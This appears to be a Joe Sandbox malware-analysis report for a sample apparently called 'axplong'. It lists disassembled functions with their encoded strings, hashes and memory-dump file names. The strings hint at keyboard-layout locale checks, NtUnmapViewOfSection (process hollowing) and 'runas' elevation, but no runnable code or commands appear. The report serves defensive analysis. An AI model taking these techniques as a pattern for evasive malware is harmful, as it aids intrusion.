String ID: $($00000419$00000422$00000423$0000043f$GVQsgL==$IVKsgL==$Keyboard Layout\Preload$NtUnmapViewOfSection$RBPleCSm$invalid stoi argument$ntdll.dll$stoi argument out of range
API String ID: 0-2634686781
Opcode ID: dfb7b4b77a9b4bf6c7e293bee6359f14b20784ce1b68bf991c705f4718b36889
Instruction ID: 0adcf61d7678e495aac61ad328cc126fa376e221b02345c107f1df5b82017553
Opcode Fuzzy Hash: dfb7b4b77a9b4bf6c7e293bee6359f14b20784ce1b68bf991c705f4718b36889
Instruction Fuzzy Hash: B5B12830A01644CFDB18DF68C9907ADBBB3FF49300F24866DE419AB782D7B19A44CB91

Function 0017BD60 Relevance: 7.8, Strings: 6, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

invalid stoi argument, xrefs: 0017E404
RHYTYv==, xrefs: 0017BE33
8KG0fymoFx==, xrefs: 0017C2EB, 0017C543
stoi argument out of range, xrefs: 0017E3FA
8KG0fCKZFzY=, xrefs: 0017C385
RpKt, xrefs: 0017D516

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 0-332458646
Opcode ID: f0c0fab9bb4a4071370bc5c7630a1f5504ab1210fbc98466e9875f05daa87c6f
Instruction ID: 3eb3067b340e42840c2ac3708c991a11190589daa58bef57338fad0a2f235b42
Opcode Fuzzy Hash: f0c0fab9bb4a4071370bc5c7630a1f5504ab1210fbc98466e9875f05daa87c6f
Instruction Fuzzy Hash: A4B1C3B16101189BEB28DF28CC85BAEBBB5EF45304F5081ADF509972C2D7759AC0CF95

Function 00175DF0 Relevance: 6.6, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 0017600A
00000422, xrefs: 00175FD9
0000043f, xrefs: 0017603B
00000419, xrefs: 00175FA8
Keyboard Layout\Preload, xrefs: 00175F64

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 31df0cb2946ef250c5f921ae72a6c8e3f2fdd0b27a862255b4f5ca7564b62365
Instruction ID: b9f67ffadd1a3ec745cf45bc609d3ce55736140fada9a32eaade6ca1d27031e8
Opcode Fuzzy Hash: 31df0cb2946ef250c5f921ae72a6c8e3f2fdd0b27a862255b4f5ca7564b62365
Instruction Fuzzy Hash: 1CE19E71900218ABEB24DFA4CC98BEEB779AF15304F5082D9E509A7291DB74AFC4CF51

Function 00177D00 Relevance: 4.1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JmpyPb==, xrefs: 0017810A
JmpxQb==, xrefs: 001781B2
JmpxRL==, xrefs: 00178062

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 0-2057465332
Opcode ID: ec30fb3025e8c7bc694e005ab28b49bf4ce55126701a54cf4455880a01dd46c4
Instruction ID: f5c64ba3cbe12b1ff4ac97659ed5f90cef6d7ae95354ba8eca0985dc5ef00629
Opcode Fuzzy Hash: ec30fb3025e8c7bc694e005ab28b49bf4ce55126701a54cf4455880a01dd46c4
Instruction Fuzzy Hash: 8AD13A70E016149BDF14BB28CC5B3AD7772AB52324F508289E429673C2DB758F80CBD2

Function 001765B0 Relevance: 4.0, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

GVQsgL==, xrefs: 001766F8
IVKsgL==, xrefs: 001767A1
RBPleCSm, xrefs: 0017666C

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 0-3856690409
Opcode ID: 1f94eaf2134ae5cae18a3af57e48fdc149d6f170d73e41aca6dbe7139956ecdf
Instruction ID: 3e70edf10771d730b99e523741fff0c67e822de3a414c34a0d2192c742fe3f09
Opcode Fuzzy Hash: 1f94eaf2134ae5cae18a3af57e48fdc149d6f170d73e41aca6dbe7139956ecdf
Instruction Fuzzy Hash: 3391A2B19001189BDB28EB24CC85BEDB779EF45304F5085E9E51997282DB709FC4CFA5

Function 0017B920 Relevance: 3.9, Strings: 3, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

RHYTYv==, xrefs: 0017BE33
8KG0fymoFx==, xrefs: 0017C2EB, 0017C543
8KG0fCKZFzY=, xrefs: 0017C385

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==
API String ID: 0-2524226959
Opcode ID: 2c1156e518ee4d69c9b3a3104c763e70b37bd556054aa35eb27126aa2d761e2a
Instruction ID: 1b983c715e277d339cb39f1346667c93fea71769d826e21d7596f350a0720ef1
Opcode Fuzzy Hash: 2c1156e518ee4d69c9b3a3104c763e70b37bd556054aa35eb27126aa2d761e2a
Instruction Fuzzy Hash: 4141B071A141099FDF08DF68CC85BEE77B9EF59314F108618EA19EB280DB74E940CB90

Function 00188E70 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 666fea38751052f6112bf329153223786da9d6ed0e8e01e379d16ca911e12602
Instruction ID: 398d52f0cd6e5626a22c540ac7f8faf66a0e3cca34fb5bb6bfd8e05f73343ce2
Opcode Fuzzy Hash: 666fea38751052f6112bf329153223786da9d6ed0e8e01e379d16ca911e12602
Instruction Fuzzy Hash: 78512772A002199FCB18EFA8DC41A6EB7A9EF55300F540669F915EB341EB30EF118B91

Function 001A6E01 Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__dosmaperr.LIBCMT ref: 001A6F12

Part of subcall function 001A7177: __dosmaperr.LIBCMT ref: 001A71AC

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID:
API String ID: 2332233096-0
Opcode ID: 1b61b75fe8e56dd1e9fc1ac16b8d687b7158e823de7f2f288819a64b6011da93
Instruction ID: 18135b5724ff816c214a60fe4ee8b49997b7a9b506a958d94e1a9c7c299bb96d
Opcode Fuzzy Hash: 1b61b75fe8e56dd1e9fc1ac16b8d687b7158e823de7f2f288819a64b6011da93
Instruction Fuzzy Hash: 8F416D79900344AFDB24EFB5EC519ABB7F9EF8A300B14452DF956D3610EB34A904CB20

Function 001794B0 Relevance: 1.5, Strings: 1, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UD==, xrefs: 00179585

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: UD==
API String ID: 0-2558787903
Opcode ID: bd815740ef0cc0857c05446fa1b42f9ce4815325af1e1e9652cdea6fc7ecc585
Instruction ID: 9bf561f94098aeccac4e60edddc5e732d2637cdd31055f6f6ac7b2c623c53082
Opcode Fuzzy Hash: bd815740ef0cc0857c05446fa1b42f9ce4815325af1e1e9652cdea6fc7ecc585
Instruction Fuzzy Hash: 9E919171A001189BDB29DF28CC557EDB776AB86304F1082E9E51DA7291DB359FC48F90

Function 00177780 Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runas, xrefs: 001772D3

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: runas
API String ID: 0-4000483414
Opcode ID: a1c7d9b2e5ae78234d0a421138389b20175612f76142ccdf5e3dfa7bf08fa9b7
Instruction ID: c1c710ebdf6c4dfc2a148b7e59a69584a46a392f751e487ba2dafef09d5222ca
Opcode Fuzzy Hash: a1c7d9b2e5ae78234d0a421138389b20175612f76142ccdf5e3dfa7bf08fa9b7
Instruction Fuzzy Hash: 45514871A042449BEB08EF38DC867AEBB72EF56314F20821CF4159B3C5DB359A40CB91

Function 04B80C69 Relevance: 1.4, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: 0e879331b76a8aa9103b1463a5b405c423e1360039c3c8c24fa01d3faa644cac
Instruction ID: b7f386841ba566c8bdb8ad7e6e3161cd1fe6e2630da4b46cc1a179ce553f1461
Opcode Fuzzy Hash: 0e879331b76a8aa9103b1463a5b405c423e1360039c3c8c24fa01d3faa644cac
Instruction Fuzzy Hash: CC1157A734D110FD6642B9492B006F6676EF6D23B033280AEFC07C5501E2A47A4EF671

Function 04B80C17 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: 27662634096e029230a9f1262a33b8f1ee50ae4ea6d72087f9e57ad82427e1a2
Instruction ID: b421fa5cf4e540dd12f2c849eb638500aec7ee913d2f1096b8b4babf62a9ed5c
Opcode Fuzzy Hash: 27662634096e029230a9f1262a33b8f1ee50ae4ea6d72087f9e57ad82427e1a2
Instruction Fuzzy Hash: E111A3EB34D110BD6142B4456B10AF6676EE2E63B033284AEFC47C5501F6D87A8EF632

Function 04B80C55 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: e824749d48a8c1b3ac9503b1351060bf33e79a04b1df4b6241a73dc12aa75dad
Instruction ID: 1493aa8a1573a74cd8091a36b2152a114fb0365424053420a5e33676d512cf48
Opcode Fuzzy Hash: e824749d48a8c1b3ac9503b1351060bf33e79a04b1df4b6241a73dc12aa75dad
Instruction Fuzzy Hash: 8A11E6A734D110FE6242B4496B146F6676EE6D637073284AEFC07C5505A2942A4DF631

Function 04B80C7D Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: d6fb1844d9478152bbc9e0d2faa10bd0a2240c21de53dc806f848d0c34222e15
Instruction ID: e6706d57d8a671c72ce57213bdc832fc6241cfe309e4bd3e79b260dd1eb40332
Opcode Fuzzy Hash: d6fb1844d9478152bbc9e0d2faa10bd0a2240c21de53dc806f848d0c34222e15
Instruction Fuzzy Hash: 9A11C6EB34D110BE614274456B10AF6676EE2D737033284AAFC47C5506E6D82A8EF632

Function 001842A0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69401ef39121a4a964dcd627855ad26c8bf3455ce6aee6a0a0a53fa8668505d
Instruction ID: 4692f3ea9b1f385eaf28ab3b201228fc65ce0bf3f9acadaa3fc0bd64c9f18ab5
Opcode Fuzzy Hash: d69401ef39121a4a964dcd627855ad26c8bf3455ce6aee6a0a0a53fa8668505d
Instruction Fuzzy Hash: ABC1F571A002489BEF08EF78CD997ADBBB5AF56304F648118F815972C6DB34DB848F91

Function 001AD4F4 Relevance: .2, Instructions: 198COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
